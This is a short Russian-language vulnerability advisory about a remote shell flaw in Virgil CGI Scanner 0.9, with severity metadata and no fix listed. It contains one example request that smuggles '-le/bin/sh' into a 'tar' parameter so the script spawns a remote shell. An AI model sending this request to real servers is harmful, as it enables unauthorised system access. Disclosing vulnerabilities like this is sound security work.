Уязвимость в сканере CGI уязвимостей Virgil
- Дата публикации:
- 23.10.2002
- Дата изменения:
- 17.10.2006
- Всего просмотров:
- 1337
- Опасность:
- Высокая
- Наличие исправления:
- Нет
- Количество уязвимостей:
- 1
- CVSSv2 рейтинг:
- CVE ID:
- Нет данных
- Вектор эксплуатации:
- Удаленная
- Воздействие:
- Компрометация системы
- CWE ID:
- Нет данных
- Наличие эксплоита:
- Нет данных
- Уязвимые продукты:
- Virgil CGI Scanner
Описание: Virgil (http://www.computec.ch/) – сканер CGI уязвимостей от Mark Ruef. Специально обработанный запрос способен породить удаленную оболочку с привилегиями CGI сценария. Пример:
/cgi-bin/virgil.cgi?tar=-le/bin/sh
уязвимость обнаружена в Virgil CGI Scanner version 0.9
Ссылки:
Virgil CGI Scanner Vulnerability